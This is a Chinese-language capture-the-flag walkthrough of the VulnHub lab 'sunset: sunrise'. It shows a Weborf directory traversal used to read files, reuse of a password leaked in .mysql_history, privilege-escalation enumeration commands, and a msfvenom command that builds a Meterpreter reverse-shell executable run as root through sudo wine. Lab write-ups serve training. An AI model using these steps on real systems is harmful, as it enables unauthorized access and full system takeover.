『VulnHub系列』sunset: sunrise-Walkthrough

靶機位址

難度：初級++

靶機釋出日期：2019年12月6日

靶機描述：Description: Have fun!

Difficulty: Beginner

Contact: @whitecr0wz

部落格中如有任何問題，懇請批評指正，萬分感謝。個人郵箱：[email protected]

工具、知識點和漏洞

• nmap
• dirsearch
• msfvenom
• metasploit
• burpsuite
• 目錄穿越漏洞
• 敏感資訊洩露
• 撞庫
• Wine提權

存疑、待解決

• 通過Wine提權之後為什麼不能調用系統的shell？

0x00、資訊收集

靶機IP：192.168.56.101

nmap -sS -T5 192.168.56.0/24
           

端口和服務

nmap -sS -T5 -A -p- 192.168.56.101
           

80端口

8080端口

Weborf/0.12.2目錄穿越漏洞

直接利用exploit-db上面的方法，可成功讀取

/etc/passwd

靶機上還運作着SSH服務，是以順理成章的想到讀取SSH的私鑰，然後利用私鑰登入靶機。

從/etc/passwd中可以發現除去root外，還有兩個使用者可以登入靶機

sunrise

和

weborf

，使用者目錄均為預設的。而SSH的私鑰一般在使用者目錄的

.ssh

目錄中。

事實證明我想的過于簡單了，兩個使用者目錄下的.ssh/id_rsa都嘗試讀取了一下，都沒有。

讀取一下使用者目錄下有哪些檔案，發現有個user.txt，看樣子是flag。

0x01、撞庫攻擊登入靶機

從目前掌握的資訊來看，Web層面除了網站的目錄周遊漏洞可以被利用，沒有其他任何可利用的東西；從運作的服務上來看，隻有SSH和MySQL存在被利用的可能性。也就是說要麼找到SSH的密碼，要麼找到MySQL的賬号和密碼。是以接下來需要做的事情，就是通過目錄周遊漏洞在靶機上搜集上述兩個資訊。

sunrise使用者目錄除了user.txt之外，沒有其他的東西了。

weborf使用者目錄居然也沒有東西

用

dirsearch

掃描一下，發現有

.mysql_history

。這個檔案是幹什麼的呢? 記錄使用者執行過的資料庫語句。

讀取一下

.mysql_history

，看到

ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

。這條語句的意思是修改

weborf

的密碼。

當得到使用者名密碼的情況下一定要試一下撞庫攻擊，往往有驚喜。是以這裡我們嘗試使用賬号

weborf

，密碼

iheartrainbows44

登入靶機，結果成功登入。

0x02、權限提升

--------------------------------------------------------------Begin 套話分割線 Begin--------------------------------------------------------------

關于Linux提權，可以直接用腳本搜集一下對于提權有用的資訊，比如用linuxprivchecker.py、LinEnum.sh.

如果你想熟悉一下沒有腳本的情況下怎麼收集這些資訊可以參考privilege_escalation_-_linux

先在kali上開啟HTTP服務

python -m SimpleHTTPServer 65534
           

使用wget下載下傳linuxprivchecker.py腳本到靶機的tmp目錄

因為本人所在的地理位置不允許直接通路Github，是以我是從自己的kali下載下傳的

cd /tmp
wget http://192.168.0.108:65534/Desktop/linuxprivchecker.py
           

為了便于檢視收集到的資訊，我将結果輸出到report.txt文本中，之後使用less檢視

python linuxprivchecker.py > report.txt
less report.txt
           

靶機做了這些後發現還是手動收集更快……，手動收集不到有效資訊的情況下再嘗試用腳本。

-------------------------------------------------------------- End 套話分割線 End --------------------------------------------------------------

SUID權限可執行檔案，沒有可用的

find / -perm -u=s -type f 2>/dev/null
           

常見的SUID提權可執行檔案

• nmap
• vim
• less
• more
• nano
• cp
• mv
• find
• wget
• bash

目前使用者可寫檔案，無。

find / -writable -type f 2>/dev/null >/tmp/report.txt
more /tmp/report.txt
           

檢視計劃任務，無。

cat /etc/crontab
           

查找sudo權限指令，提示

weborf

使用者無權限運作sudo指令。

sudo -l
           

找了一圈也沒找到什麼東西，發現還有資料庫沒登入過。

猜測

thefutureissobrightigottawearshades

就是sunrise使用者的密碼了，這是我見過最長的密碼了……

看到通過sudo 指令執行

/usr/bin/wine

的時候擁有的是root權限。

wine就是那個可以在Linux系統上運作.exe的軟體。

方法就是通過msfvenom生成一個反彈shell的.exe檔案，然後通過wine去運作。

msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.56.102 lport=1234 >ins1ght.exe
           

如果你有其他的方法，歡迎留言。要是有寫錯了的地方，請你一定要告訴我。要是你覺得這篇部落格寫的還不錯，歡迎分享給身邊的人。我是ins1ght.